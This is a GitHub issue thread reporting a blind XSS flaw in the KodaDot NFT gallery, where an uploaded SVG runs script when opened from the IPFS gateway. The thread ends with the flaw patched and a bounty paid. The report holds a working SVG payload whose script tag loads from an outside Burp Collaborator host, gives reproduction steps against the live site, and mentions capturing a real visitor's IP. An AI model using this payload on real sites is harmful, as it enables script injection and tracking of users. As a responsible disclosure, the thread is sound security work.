### ISSUE TITLE
Blind XSS

### ISSUE THREAD

**Issue by magrisya** [kodadot/nft-gallery#2434]
### What happened?

This is my first report, so it's a bit messy.
Let me explain: I came across XSS when I wanted to make simple nft I just realized that the .svg extension can be sent on the server,
I entered the blind xss payload and it was successfully sent on the ipfs server

### Please reproduce in steps

Steps To Reproduce:
1. prepare a new file with the contents:

```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC
"-//W3C//DTD SVG 1.1//EN"
"http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg width="200"        
height="200"        
zoomAndPan="disable"        
xmlns="http://www.w3.org/2000/svg"        
xmlns:xlink="http://www.w3.org/1999/xlink"        
xml:space="preserve">
<!-- Script linked from the outside-->     
<script xlink:href="https://t1vu4nyhnay9vzn3usngjmagp7v2jr.burpcollaborator.net" />     
<script>       
//<![CDATA[         
alert("XSS");       
]]>     
</script>   
</svg>
```

2. save with the extension test.svg
3. go to the website https://kodadot.xyz/
4. and make it simple nft
5. Upload the test.svg file
fill in the name, symbol, description, quantity and price
then "Click to create NFT(S).

After that go to profile
this is my profile "https://kodadot.xyz/rmrk/u/GF4v68qJmh47eShYNpPs5JNfn5bxG5Kz1U2Y4xC2xAqXqmq"
and my test.svg file upload result "https://kodadot.xyz/rmrk/detail/11539488-A2421E1ACB58485A27-BLD-BLIND-0000000000000001"
right click and open the test.svg image will be directed to "https://kodadot.mypinata.cloud/ipfs/bafkreie5kntokfjs4m7qidziooog4gssj73ugzkbcdjh3ngpt4rkdrgxra"
and xss will be active and the attacker can see the victim's activity from BurpSuite

### Expected Behavior

Allows hackers to execute javascript remotely. If the victim clicks on the link provided by the hacker, then goes to ipfs/ ANYTIME after this, XSS will be activated.
For people who support chat, they don't even need to click on a link to enable XSS.
and attacker can see victim's IP or something else.

### What browsers are you seeing the problem on?

Firefox, Chrome, Mobile Android Chrome, Mobile Firefox

### Are you logged in?

Yes

### At which address did you encounter bug?

nft.kodadot.xyz / kodadot.xyz

### Screenshots

![Screenshot_1](https://user-images.githubusercontent.com/43703018/155438822-7a8742aa-76ac-4baa-bb04-b050df5ac533.png)

![photo6104923444782149116](https://user-images.githubusercontent.com/43703018/155439195-5503b785-df88-44de-9f59-9c25acde6d7d.jpg)

![Screenshot_2](https://user-images.githubusercontent.com/43703018/155439210-2179c901-cb0f-4824-a793-2ae479ef484a.png)

### Relevant log output

```shell
HTTP/1.1 200 OK
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Content-Type: text/html
Content-Length: 53

<html><body>tvlmmzl3rpikwzzlgoyjm7zjngz</body></html>
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by yangwao** [comment]
Seems like #542

How would you mitigate this?

**Comment by magrisya** [comment]
curiously someone will click on the image and will be redirected to where the image contains the xss.
because it all comes from the official website https://kodadot.xyz/ so the victim believes and is sure to go there,
and as a result the victim will be deceived like this case..
i just got someone clicking on the link and i managed to get the ip :
![Screenshot_1](https://user-images.githubusercontent.com/43703018/155486057-0fc0e5ac-7437-45ed-bccb-410f727ec5f5.png)

**Comment by magrisya** [comment]
ok sir let's do i follow the rules that have been set here. so let's get it done...

**Comment by vikiival** [comment]
My github wasn't refreshed so I i missed the rest of this conversation. I'm sorry 🥺

**Comment by magrisya** [comment]
> My github wasn't refreshed so I i missed the rest of this conversation. I'm sorry 🥺

no problem sir i'm still here for you..it seems this is a serious bug because from here it can reach some bugs like: SSRF,Stored XSS,Blind XSS, Log4Shell or others and can be loaded at any time.
and the attacker can monitor the victim remotely, isn't that terrible?

**Comment by magrisya** [comment]
hi teamm..~
looks like this issue has been patched.
I tested on Firefox,Chrome and Microsoft Edge and svg it's not working anymore.
can we close this report?

![Screenshot_1](https://user-images.githubusercontent.com/43703018/155725400-2b48f501-d06f-4df2-b1a9-63fd024c5be9.png)

**Comment by magrisya** [comment]
hey that's him. this is my address payment link:
https://kodadot.xyz/transfer/?target=GF4v68qJmh47eShYNpPs5JNfn5bxG5Kz1U2Y4xC2xAqXqmq&usdamount=640

**Comment by yangwao** [comment]
I've sent out to you $300 [kusama.subscan.io/extrinsic/0x0a3b2a972728dc7483b37bc433b076d110147905588e0d234f1105ad8468b4cf](https://kusama.subscan.io/extrinsic/0x0a3b2a972728dc7483b37bc433b076d110147905588e0d234f1105ad8468b4cf)
